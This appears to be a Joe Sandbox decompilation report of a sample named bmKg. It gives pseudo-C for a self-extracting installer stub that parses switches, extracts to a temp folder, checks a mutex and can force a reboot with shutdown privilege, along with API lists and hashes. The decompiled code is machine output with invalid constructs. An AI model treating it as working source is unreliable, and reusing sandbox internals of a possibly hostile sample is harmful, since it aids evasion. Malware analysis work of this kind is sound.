                              									} else {
                              										goto L21;
                              									}
                              								} else {
                              									_t69 =  *_t69;
                              									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                              										break;
                              									} else {
                              										_t69 = _v272;
                              										L21:
                              										_t155 =  *_t69;
                              										if(_t155 != 0x22) {
                              											if(_t202 >= 0x104) {
                              												goto L106;
                              											} else {
                              												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                              												_t177 = _t177 + 1;
                              												_t202 = _t202 + 1;
                              												_t157 = 1;
                              												goto L30;
                              											}
                              										} else {
                              											if(_v272[1] == 0x22) {
                              												if(_t202 >= 0x104) {
                              													L106:
                              													_t63 = 0;
                              													L125:
                              													_pop(_t210);
                              													_pop(_t212);
                              													_pop(_t162);
                              													return E00A76CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                              												} else {
                              													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                              													_t177 = _t177 + 1;
                              													_t202 = _t202 + 1;
                              													_t157 = 2;
                              													goto L30;
                              												}
                              											} else {
                              												_t157 = 1;
                              												if(_t213 != 0) {
                              													_t163 = 1;
                              												} else {
                              													_t213 = 1;
                              												}
                              												goto L30;
                              											}
                              										}
                              									}
                              								}
                              								goto L131;
                              								L30:
                              								_v272 =  &(_v272[_t157]);
                              								_t69 = _v272;
                              							} while ( *_t69 != 0);
                              							if(_t177 >= 0x104) {
                              								E00A76E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                              								asm("int3");
                              								_push(_t221);
                              								_t222 = _t223;
                              								_t71 =  *0xa78004; // 0x74742267
                              								_v296 = _t71 ^ _t223;
                              								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                              									0x4f0 = 2;
                              									_t75 = E00A7597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                              								} else {
                              									E00A744B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                              									 *0xa79124 = E00A76285();
                              									_t75 = 0;
                              								}
                              								return E00A76CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                              							} else {
                              								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                              								if(_t213 == 0) {
                              									if(_t163 != 0) {
                              										goto L34;
                              									} else {
                              										goto L40;
                              									}
                              								} else {
                              									if(_t163 != 0) {
                              										L40:
                              										_t79 = _v268;
                              										if(_t79 == 0x2f || _t79 == 0x2d) {
                              											_t83 = CharUpperA(_v267) - 0x3f;
                              											if(_t83 == 0) {
                              												_t202 = 0x521;
                              												E00A744B9(0, 0x521, 0xa71140, 0, 0x40, 0);
                              												_t85 =  *0xa78588; // 0x0
                              												if(_t85 != 0) {
                              													CloseHandle(_t85);
                              												}
                              												ExitProcess(0);
                              											}
                              											_t87 = _t83 - 4;
                              											if(_t87 == 0) {
                              												if(_v266 != 0) {
                              													if(_v266 != 0x3a) {
                              														goto L49;
                              													} else {
                              														_t167 = (0 | _v265 == 0x00000022) + 3;
                              														_t215 =  &_v268 + _t167;
                              														_t183 =  &_v268 + _t167;
                              														_t50 = _t183 + 1; // 0x1
                              														_t202 = _t50;
                              														do {
                              															_t88 =  *_t183;
                              															_t183 = _t183 + 1;
                              														} while (_t88 != 0);
                              														if(_t183 == _t202) {
                              															goto L49;
                              														} else {
                              															_t205 = 0x5b;
                              															if(E00A7667F(_t215, _t205) == 0) {
                              																L115:
                              																_t206 = 0x5d;
                              																if(E00A7667F(_t215, _t206) == 0) {
                              																	L117:
                              																	_t202 =  &_v276;
                              																	_v276 = _t167;
                              																	if(E00A75C17(_t215,  &_v276) == 0) {
                              																		goto L49;
                              																	} else {
                              																		_t202 = 0x104;
                              																		E00A71680(0xa78c42, 0x104, _v276 + _t167 +  &_v268);
                              																	}
                              																} else {
                              																	_t202 = 0x5b;
                              																	if(E00A7667F(_t215, _t202) == 0) {
                              																		goto L49;
                              																	} else {
                              																		goto L117;
                              																	}
                              																}
                              															} else {
                              																_t202 = 0x5d;
                              																if(E00A7667F(_t215, _t202) == 0) {
                              																	goto L49;
                              																} else {
                              																	goto L115;
                              																}
                              															}
                              														}
                              													}
                              												} else {
                              													 *0xa78a24 = 1;
                              												}
                              												goto L50;
                              											} else {
                              												_t100 = _t87 - 1;
                              												if(_t100 == 0) {
                              													L98:
                              													if(_v266 != 0x3a) {
                              														goto L49;
                              													} else {
                              														_t170 = (0 | _v265 == 0x00000022) + 3;
                              														_t217 =  &_v268 + _t170;
                              														_t192 =  &_v268 + _t170;
                              														_t38 = _t192 + 1; // 0x1
                              														_t202 = _t38;
                              														do {
                              															_t101 =  *_t192;
                              															_t192 = _t192 + 1;
                              														} while (_t101 != 0);
                              														if(_t192 == _t202) {
                              															goto L49;
                              														} else {
                              															_t202 =  &_v276;
                              															_v276 = _t170;
                              															if(E00A75C17(_t217,  &_v276) == 0) {
                              																goto L49;
                              															} else {
                              																_t104 = CharUpperA(_v267);
                              																_t218 = 0xa78b3e;
                              																_t105 = _v276;
                              																if(_t104 != 0x54) {
                              																	_t218 = 0xa78a3a;
                              																}
                              																E00A71680(_t218, 0x104, _t105 + _t170 +  &_v268);
                              																_t202 = 0x104;
                              																E00A7658A(_t218, 0x104, 0xa71140);
                              																if(E00A731E0(_t218) != 0) {
                              																	goto L50;
                              																} else {
                              																	goto L106;
                              																}
                              															}
                              														}
                              													}
                              												} else {
                              													_t111 = _t100 - 0xa;
                              													if(_t111 == 0) {
                              														if(_v266 != 0) {
                              															if(_v266 != 0x3a) {
                              																goto L49;
                              															} else {
                              																_t199 = _v265;
                              																if(_t199 != 0) {
                              																	_t219 =  &_v265;
                              																	do {
                              																		_t219 = _t219 + 1;
                              																		_t115 = CharUpperA(_t199) - 0x45;
                              																		if(_t115 == 0) {
                              																			 *0xa78a2c = 1;
                              																		} else {
                              																			_t200 = 2;
                              																			_t119 = _t115 - _t200;
                              																			if(_t119 == 0) {
                              																				 *0xa78a30 = 1;
                              																			} else {
                              																				if(_t119 == 0xf) {
                              																					 *0xa78a34 = 1;
                              																				} else {
                              																					_t209 = 0;
                              																				}
                              																			}
                              																		}
                              																		_t118 =  *_t219;
                              																		_t199 = _t118;
                              																	} while (_t118 != 0);
                              																}
                              															}
                              														} else {
                              															 *0xa78a2c = 1;
                              														}
                              														goto L50;
                              													} else {
                              														_t127 = _t111 - 3;
                              														if(_t127 == 0) {
                              															if(_v266 != 0) {
                              																if(_v266 != 0x3a) {
                              																	goto L49;
                              																} else {
                              																	_t129 = CharUpperA(_v265);
                              																	if(_t129 == 0x31) {
                              																		goto L76;
                              																	} else {
                              																		if(_t129 == 0x41) {
                              																			goto L83;
                              																		} else {
                              																			if(_t129 == 0x55) {
                              																				goto L76;
                              																			} else {
                              																				goto L49;
                              																			}
                              																		}
                              																	}
                              																}
                              															} else {
                              																L76:
                              																_push(2);
                              																_pop(1);
                              																L83:
                              																 *0xa78a38 = 1;
                              															}
                              															goto L50;
                              														} else {
                              															_t132 = _t127 - 1;
                              															if(_t132 == 0) {
                              																if(_v266 != 0) {
                              																	if(_v266 != 0x3a) {
                              																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                              																			goto L49;
                              																		}
                              																	} else {
                              																		_t201 = _v265;
                              																		 *0xa79a2c = 1;
                              																		if(_t201 != 0) {
                              																			_t220 =  &_v265;
                              																			do {
                              																				_t220 = _t220 + 1;
                              																				_t142 = CharUpperA(_t201) - 0x41;
                              																				if(_t142 == 0) {
                              																					_t143 = 2;
                              																					 *0xa79a2c =  *0xa79a2c | _t143;
                              																					goto L70;
                              																				} else {
                              																					_t145 = _t142 - 3;
                              																					if(_t145 == 0) {
                              																						 *0xa78d48 =  *0xa78d48 | 0x00000040;
                              																					} else {
                              																						_t146 = _t145 - 5;
                              																						if(_t146 == 0) {
                              																							 *0xa79a2c =  *0xa79a2c & 0xfffffffd;
                              																							goto L70;
                              																						} else {
                              																							_t147 = _t146 - 5;
                              																							if(_t147 == 0) {
                              																								 *0xa79a2c =  *0xa79a2c & 0xfffffffe;
                              																								goto L70;
                              																							} else {
                              																								_t149 = _t147;
                              																								if(_t149 == 0) {
                              																									 *0xa78d48 =  *0xa78d48 | 0x00000080;
                              																								} else {
                              																									if(_t149 == 3) {
                              																										 *0xa79a2c =  *0xa79a2c | 0x00000004;
                              																										L70:
                              																										 *0xa78a28 = 1;
                              																									} else {
                              																										_t209 = 0;
                              																									}
                              																								}
                              																							}
                              																						}
                              																					}
                              																				}
                              																				_t144 =  *_t220;
                              																				_t201 = _t144;
                              																			} while (_t144 != 0);
                              																		}
                              																	}
                              																} else {
                              																	 *0xa79a2c = 3;
                              																	 *0xa78a28 = 1;
                              																}
                              																goto L50;
                              															} else {
                              																if(_t132 == 0) {
                              																	goto L98;
                              																} else {
                              																	L49:
                              																	_t209 = 0;
                              																	L50:
                              																	_t173 = _v272;
                              																	if( *_t173 != 0) {
                              																		goto L2;
                              																	} else {
                              																		break;
                              																	}
                              																}
                              															}
                              														}
                              													}
                              												}
                              											}
                              										} else {
                              											goto L106;
                              										}
                              									} else {
                              										L34:
                              										_t209 = 0;
                              										break;
                              									}
                              								}
                              							}
                              						}
                              						goto L131;
                              					}
                              					if( *0xa78a2c != 0 &&  *0xa78b3e == 0) {
                              						if(GetModuleFileNameA( *0xa79a3c, 0xa78b3e, 0x104) == 0) {
                              							_t209 = 0;
                              						} else {
                              							_t202 = 0x5c;
                              							 *((char*)(E00A766C8(0xa78b3e, _t202) + 1)) = 0;
                              						}
                              					}
                              					_t63 = _t209;
                              				}
                              				L131:
                              			}

                              APIs
                              • CharNextA.USER32(?,00000000,?,?), ref: 00A75CEE
                              • GetModuleFileNameA.KERNEL32(00A78B3E,00000104,00000000,?,?), ref: 00A75DFC
                              • CharUpperA.USER32(?), ref: 00A75E3E
                              • CharUpperA.USER32(-00000052), ref: 00A75EE1
                              • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00A75F6F
                              • CharUpperA.USER32(?), ref: 00A75FA7
                              • CharUpperA.USER32(-0000004E), ref: 00A76008
                              • CharUpperA.USER32(?), ref: 00A760AA
                              • CloseHandle.KERNEL32(00000000,00A71140,00000000,00000040,00000000), ref: 00A761F1
                              • ExitProcess.KERNEL32 ref: 00A761F8
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                              • String ID: "$"$:$RegServer
                              • API String ID: 1203814774-25366791
                              • Opcode ID: 1050b6835def4a5fabd6c0789a5792fd65f1a22012f0be019a06ce3d187e62eb
                              • Instruction ID: 7b3fa27845451a50cafefffb55b00e20efb18706ad71255f9869bba98ab56e1f
                              • Opcode Fuzzy Hash: 1050b6835def4a5fabd6c0789a5792fd65f1a22012f0be019a06ce3d187e62eb
                              • Instruction Fuzzy Hash: 5BD12471E44E445EDB39CB788C4C7FA3BA5AB56340F58C1AAC48ED6191DAF48EC78B40
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 60%
                              			E00A71F90(signed int __ecx, void* __edi, void* __esi) {
                              				signed int _v8;
                              				int _v12;
                              				struct _TOKEN_PRIVILEGES _v24;
                              				void* _v28;
                              				void* __ebx;
                              				signed int _t13;
                              				int _t21;
                              				void* _t25;
                              				int _t28;
                              				signed char _t30;
                              				void* _t38;
                              				void* _t40;
                              				void* _t41;
                              				signed int _t46;
                              
                              				_t41 = __esi;
                              				_t38 = __edi;
                              				_t30 = __ecx;
                              				if((__ecx & 0x00000002) != 0) {
                              					L12:
                              					if((_t30 & 0x00000004) != 0) {
                              						L14:
                              						if( *0xa79a40 != 0) {
                              							_pop(_t30);
                              							_t44 = _t46;
                              							_t13 =  *0xa78004; // 0x74742267
                              							_v8 = _t13 ^ _t46;
                              							_push(_t38);
                              							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                              								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                              								_v24.PrivilegeCount = 1;
                              								_v12 = 2;
                              								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                              								CloseHandle(_v28);
                              								_t41 = _t41;
                              								_push(0);
                              								if(_t21 != 0) {
                              									if(ExitWindowsEx(2, ??) != 0) {
                              										_t25 = 1;
                              									} else {
                              										_t37 = 0x4f7;
                              										goto L3;
                              									}
                              								} else {
                              									_t37 = 0x4f6;
                              									goto L4;
                              								}
                              							} else {
                              								_t37 = 0x4f5;
                              								L3:
                              								_push(0);
                              								L4:
                              								_push(0x10);
                              								_push(0);
                              								_push(0);
                              								E00A744B9(0, _t37);
                              								_t25 = 0;
                              							}
                              							_pop(_t40);
                              							return E00A76CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                              						} else {
                              							_t28 = ExitWindowsEx(2, 0);
                              							goto L16;
                              						}
                              					} else {
                              						_t37 = 0x522;
                              						_t28 = E00A744B9(0, 0x522, 0xa71140, 0, 0x40, 4);
                              						if(_t28 != 6) {
                              							goto L16;
                              						} else {
                              							goto L14;
                              						}
                              					}
                              				} else {
                              					__eax = E00A71EA7(__ecx);
                              					if(__eax != 2) {
                              						L16:
                              						return _t28;
                              					} else {
                              						goto L12;
                              					}
                              				}
                              			}

                              APIs
                              • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00A71EFB
                              • OpenProcessToken.ADVAPI32(00000000), ref: 00A71F02
                              • ExitWindowsEx.USER32(00000002,00000000), ref: 00A71FD3
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Process$CurrentExitOpenTokenWindows
                              • String ID: SeShutdownPrivilege
                              • API String ID: 2795981589-3733053543
                              • Opcode ID: cbe581605863937d8f78e37d12d2b235cac3454c59985071a8c0284a8d675d40
                              • Instruction ID: db1afff4fd3863c023c7a76f559a97e2c78093999597448e2c2844583a42d552
                              • Opcode Fuzzy Hash: cbe581605863937d8f78e37d12d2b235cac3454c59985071a8c0284a8d675d40
                              • Instruction Fuzzy Hash: C921B471B402057BEB209BE99C4AFBF76F8EBC5B11F10C51AFA0EE6180D77488429261
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00A76CF0(struct _EXCEPTION_POINTERS* _a4) {
                              
                              				SetUnhandledExceptionFilter(0);
                              				UnhandledExceptionFilter(_a4);
                              				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                              			}

                              APIs
                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00A76E26,00A71000), ref: 00A76CF7
                              • UnhandledExceptionFilter.KERNEL32(00A76E26,?,00A76E26,00A71000), ref: 00A76D00
                              • GetCurrentProcess.KERNEL32(C0000409,?,00A76E26,00A71000), ref: 00A76D0B
                              • TerminateProcess.KERNEL32(00000000,?,00A76E26,00A71000), ref: 00A76D12
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                              • String ID:
                              • API String ID: 3231755760-0
                              • Opcode ID: d21ab630a257d9341cdb25e119b49de2390b72c3a1d0a985614891729c2b38ba
                              • Instruction ID: 5041786f5f7f92017fa1684d25197f42196d650719d28b005f300b949747859e
                              • Opcode Fuzzy Hash: d21ab630a257d9341cdb25e119b49de2390b72c3a1d0a985614891729c2b38ba
                              • Instruction Fuzzy Hash: FAD0C932000108BBFB006BE1EC0CA5D3F28EBD8223F84C100F31D82420CA324492CB52
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 76%
                              			E00A73210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                              				void* __edi;
                              				void* _t6;
                              				void* _t10;
                              				int _t20;
                              				int _t21;
                              				int _t23;
                              				char _t24;
                              				long _t25;
                              				int _t27;
                              				int _t30;
                              				void* _t32;
                              				int _t33;
                              				int _t34;
                              				int _t37;
                              				int _t38;
                              				int _t39;
                              				void* _t42;
                              				void* _t46;
                              				CHAR* _t49;
                              				void* _t58;
                              				void* _t63;
                              				struct HWND__* _t64;
                              
                              				_t64 = _a4;
                              				_t6 = _a8 - 0x10;
                              				if(_t6 == 0) {
                              					_push(0);
                              					L38:
                              					EndDialog(_t64, ??);
                              					L39:
                              					__eflags = 1;
                              					return 1;
                              				}
                              				_t42 = 1;
                              				_t10 = _t6 - 0x100;
                              				if(_t10 == 0) {
                              					E00A743D0(_t64, GetDesktopWindow());
                              					SetWindowTextA(_t64, "lenta");
                              					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                              					__eflags =  *0xa79a40 - _t42; // 0x3
                              					if(__eflags == 0) {
                              						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                              					}
                              					L36:
                              					return _t42;
                              				}
                              				if(_t10 == _t42) {
                              					_t20 = _a12 - 1;
                              					__eflags = _t20;
                              					if(_t20 == 0) {
                              						_t21 = GetDlgItemTextA(_t64, 0x835, 0xa791e4, 0x104);
                              						__eflags = _t21;
                              						if(_t21 == 0) {
                              							L32:
                              							_t58 = 0x4bf;
                              							_push(0);
                              							_push(0x10);
                              							_push(0);
                              							_push(0);
                              							L25:
                              							E00A744B9(_t64, _t58);
                              							goto L39;
                              						}
                              						_t49 = 0xa791e4;
                              						do {
                              							_t23 =  *_t49;
                              							_t49 =  &(_t49[1]);
                              							__eflags = _t23;
                              						} while (_t23 != 0);
                              						__eflags = _t49 - 0xa791e5 - 3;
                              						if(_t49 - 0xa791e5 < 3) {
                              							goto L32;
                              						}
                              						_t24 =  *0xa791e5; // 0x3a
                              						__eflags = _t24 - 0x3a;
                              						if(_t24 == 0x3a) {
                              							L21:
                              							_t25 = GetFileAttributesA(0xa791e4);
                              							__eflags = _t25 - 0xffffffff;
                              							if(_t25 != 0xffffffff) {
                              								L26:
                              								E00A7658A(0xa791e4, 0x104, 0xa71140);
                              								_t27 = E00A758C8(0xa791e4);
                              								__eflags = _t27;
                              								if(_t27 != 0) {
                              									__eflags =  *0xa791e4 - 0x5c;
                              									if( *0xa791e4 != 0x5c) {
                              										L30:
                              										_t30 = E00A7597D(0xa791e4, 1, _t64, 1);
                              										__eflags = _t30;
                              										if(_t30 == 0) {
                              											L35:
                              											_t42 = 1;
                              											__eflags = 1;
                              											goto L36;
                              										}
                              										L31:
                              										_t42 = 1;
                              										EndDialog(_t64, 1);
                              										goto L36;
                              									}
                              									__eflags =  *0xa791e5 - 0x5c;
                              									if( *0xa791e5 == 0x5c) {
                              										goto L31;
                              									}
                              									goto L30;
                              								}
                              								_push(0);
                              								_push(0x10);
                              								_push(0);
                              								_push(0);
                              								_t58 = 0x4be;
                              								goto L25;
                              							}
                              							_t32 = E00A744B9(_t64, 0x54a, 0xa791e4, 0, 0x20, 4);
                              							__eflags = _t32 - 6;
                              							if(_t32 != 6) {
                              								goto L35;
                              							}
                              							_t33 = CreateDirectoryA(0xa791e4, 0);
                              							__eflags = _t33;
                              							if(_t33 != 0) {
                              								goto L26;
                              							}
                              							_push(0);
                              							_push(0x10);
                              							_push(0);
                              							_push(0xa791e4);
                              							_t58 = 0x4cb;
                              							goto L25;
                              						}
                              						__eflags =  *0xa791e4 - 0x5c;
                              						if( *0xa791e4 != 0x5c) {
                              							goto L32;
                              						}
                              						__eflags = _t24 - 0x5c;
                              						if(_t24 != 0x5c) {
                              							goto L32;
                              						}
                              						goto L21;
                              					}
                              					_t34 = _t20 - 1;
                              					__eflags = _t34;
                              					if(_t34 == 0) {
                              						EndDialog(_t64, 0);
                              						 *0xa79124 = 0x800704c7;
                              						goto L39;
                              					}
                              					__eflags = _t34 != 0x834;
                              					if(_t34 != 0x834) {
                              						goto L36;
                              					}
                              					_t37 = LoadStringA( *0xa79a3c, 0x3e8, 0xa78598, 0x200);
                              					__eflags = _t37;
                              					if(_t37 != 0) {
                              						_t38 = E00A74224(_t64, _t46, _t46);
                              						__eflags = _t38;
                              						if(_t38 == 0) {
                              							goto L36;
                              						}
                              						_t39 = SetDlgItemTextA(_t64, 0x835, 0xa787a0);
                              						__eflags = _t39;
                              						if(_t39 != 0) {
                              							goto L36;
                              						}
                              						_t63 = 0x4c0;
                              						L9:
                              						E00A744B9(_t64, _t63, 0, 0, 0x10, 0);
                              						_push(0);
                              						goto L38;
                              					}
                              					_t63 = 0x4b1;
                              					goto L9;
                              				}
                              				return 0;
                              			}

                              APIs
                              • LoadStringA.USER32(000003E8,00A78598,00000200), ref: 00A73271
                              • GetDesktopWindow.USER32 ref: 00A733E2
                              • SetWindowTextA.USER32(?,lenta), ref: 00A733F7
                              • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00A73410
                              • GetDlgItem.USER32(?,00000836), ref: 00A73426
                              • EnableWindow.USER32(00000000), ref: 00A7342D
                              • EndDialog.USER32(?,00000000), ref: 00A7343F
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$lenta
                              • API String ID: 2418873061-7669773
                              • Opcode ID: 7b6ddd44e6331fd5bd97bc222f5a3b6e47667605436290f48534496ff0b2d5bc
                              • Instruction ID: abc7ce120f8b2eeee0c285a292ac72f3dfeac4957955a9dc95c213459b2e677d
                              • Opcode Fuzzy Hash: 7b6ddd44e6331fd5bd97bc222f5a3b6e47667605436290f48534496ff0b2d5bc
                              • Instruction Fuzzy Hash: C9514C3234024077FF359B755C8CFBF2A5CDB96B52F51C128F54EAA1D1CAA48A42F261
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 93%
                              			E00A72CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                              				signed int _v8;
                              				char _v268;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t13;
                              				void* _t20;
                              				void* _t23;
                              				void* _t27;
                              				struct HRSRC__* _t31;
                              				intOrPtr _t33;
                              				void* _t43;
                              				void* _t48;
                              				signed int _t65;
                              				struct HINSTANCE__* _t66;
                              				signed int _t67;
                              
                              				_t13 =  *0xa78004; // 0x74742267
                              				_v8 = _t13 ^ _t67;
                              				_t65 = 0;
                              				_t66 = __ecx;
                              				_t48 = __edx;
                              				 *0xa79a3c = __ecx;
                              				memset(0xa79140, 0, 0x8fc);
                              				memset(0xa78a20, 0, 0x32c);
                              				memset(0xa788c0, 0, 0x104);
                              				 *0xa793ec = 1;
                              				_t20 = E00A7468F("TITLE", 0xa79154, 0x7f);
                              				if(_t20 == 0 || _t20 > 0x80) {
                              					_t64 = 0x4b1;
                              					goto L32;
                              				} else {
                              					_t27 = CreateEventA(0, 1, 1, 0);
                              					 *0xa7858c = _t27;
                              					SetEvent(_t27);
                              					_t64 = 0xa79a34;
                              					if(E00A7468F("EXTRACTOPT", 0xa79a34, 4) != 0) {
                              						if(( *0xa79a34 & 0x000000c0) == 0) {
                              							L12:
                              							 *0xa79120 =  *0xa79120 & _t65;
                              							if(E00A75C9E(_t48, _t48, _t65, _t66) != 0) {
                              								if( *0xa78a3a == 0) {
                              									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                              									if(_t31 != 0) {
                              										_t65 = LoadResource(_t66, _t31);
                              									}
                              									if( *0xa78184 != 0) {
                              										__imp__#17();
                              									}
                              									if( *0xa78a24 == 0) {
                              										_t57 = _t65;
                              										if(E00A736EE(_t65) == 0) {
                              											goto L33;
                              										} else {
                              											_t33 =  *0xa79a40; // 0x3
                              											_t48 = 1;
                              											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                              												if(( *0xa79a34 & 0x00000100) == 0 || ( *0xa78a38 & 0x00000001) != 0 || E00A718A3(_t64, _t66) != 0) {
                              													goto L30;
                              												} else {
                              													_t64 = 0x7d6;
                              													if(E00A76517(_t57, 0x7d6, _t34, E00A719E0, 0x547, 0x83e) != 0x83d) {
                              														goto L33;
                              													} else {
                              														goto L30;
                              													}
                              												}
                              											} else {
                              												L30:
                              												_t23 = _t48;
                              											}
                              										}
                              									} else {
                              										_t23 = 1;
                              									}
                              								} else {
                              									E00A72390(0xa78a3a);
                              									goto L33;
                              								}
                              							} else {
                              								_t64 = 0x520;
                              								L32:
                              								E00A744B9(0, _t64, 0, 0, 0x10, 0);
                              								goto L33;
                              							}
                              						} else {
                              							_t64 =  &_v268;
                              							if(E00A7468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                              								goto L3;
                              							} else {
                              								_t43 = CreateMutexA(0, 1,  &_v268);
                              								 *0xa78588 = _t43;
                              								if(_t43 == 0 || GetLastError() != 0xb7) {
                              									goto L12;
                              								} else {
                              									if(( *0xa79a34 & 0x00000080) == 0) {
                              										_t64 = 0x524;
                              										if(E00A744B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                              											goto L12;
                              										} else {
                              											goto L11;
                              										}
                              									} else {
                              										_t64 = 0x54b;
                              										E00A744B9(0, 0x54b, "lenta", 0, 0x10, 0);
                              										L11:
                              										CloseHandle( *0xa78588);
                              										 *0xa79124 = 0x800700b7;
                              										goto L33;
                              									}
                              								}
                              							}
                              						}
                              					} else {
                              						L3:
                              						_t64 = 0x4b1;
                              						E00A744B9(0, 0x4b1, 0, 0, 0x10, 0);
                              						 *0xa79124 = 0x80070714;
                              						L33:
                              						_t23 = 0;
                              					}
                              				}
                              				return E00A76CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                              			}




















                              APIs
                              • memset.MSVCRT ref: 00A72CD9
                              • memset.MSVCRT ref: 00A72CE9
                              • memset.MSVCRT ref: 00A72CF9
                                • Part of subcall function 00A7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A746A0
                                • Part of subcall function 00A7468F: SizeofResource.KERNEL32(00000000,00000000,?,00A72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746A9
                                • Part of subcall function 00A7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A746C3
                                • Part of subcall function 00A7468F: LoadResource.KERNEL32(00000000,00000000,?,00A72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746CC
                                • Part of subcall function 00A7468F: LockResource.KERNEL32(00000000,?,00A72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746D3
                                • Part of subcall function 00A7468F: memcpy_s.MSVCRT ref: 00A746E5
                                • Part of subcall function 00A7468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746EF
                              • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A72D34
                              • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00A72D40
                              • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00A72DAE
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00A72DBD
                              • CloseHandle.KERNEL32(lenta,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00A72E0A
                                • Part of subcall function 00A744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A74518
